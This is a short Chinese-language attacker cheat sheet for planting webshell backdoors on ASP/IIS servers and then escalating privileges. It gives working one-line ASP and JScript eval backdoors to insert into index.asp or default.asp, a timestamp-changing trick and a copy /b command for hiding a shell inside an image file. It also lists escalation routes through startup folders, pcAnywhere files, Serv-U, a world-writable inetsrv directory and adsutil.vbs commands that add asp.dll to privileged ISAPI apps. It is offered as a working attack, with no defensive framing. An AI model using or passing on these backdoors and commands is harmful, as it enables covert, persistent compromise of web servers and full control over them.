暗藏webshell後門
1.插一句木馬後門,在index.asp或者default.asp在最底部或者中間加入
<% eval request ("pass") %>有時候會出錯測在後門代碼處理為
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>try {eval(Request.from('pass')+'')}
catch(e) {} </SCRIPT>
2.修改webshell時間(asp木馬時間修改器)
3.圖檔留後門
copy /b 1.asp+ 1.gif asp.asp
webshell提權
1.系統啟動項提權
1)C:\documents and setting\all user\開始\菜單\程式\啟動
2.PCanywhere連接配接提權
1)C:\documents and setting\all user\AppData\symantec\pcanywhere找到擴充名為cif
3.serv-U提權
4.erveryone完全控制木馬運作
c:\windows\system32\inetsrv\data目錄通常是erveryone完全控制權限。把提升權限的工具
放在這裡就ok
5.adsutil.vbs提權
1)檢視C:\inetpub\adminscript\下面有木有“adsutil.vbs”如果有可利用它提權
csctipt c:\inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps
2)特權的dll檔案存在沒有,如idq.dll,httpext.dll,httpodbc.dll,ssinc.dll和msw3prt.dll
如果存在檔案将asp.asp加入特權組,使用webshell獲得最高控制權限
cscript adsutil.vbs set /w3svc/inprocessisapiapps
"c:\windows\system32\idq.dll"
"c:\windows\system32\inetsrv\httpext.dll"
"c:\windows\system32\inetsrv\httpodbc.dll"
"c:\windows\system32\inetsrv\ssinc.dll"
"c:\windows\system32\msw3prt.dll"
"c:\windows\system32\inetsrv\asp.dll"
3)完成後,可以用指令查提權成功木有
cscript adsutil.vbs get w3svc/inprocessisapiapps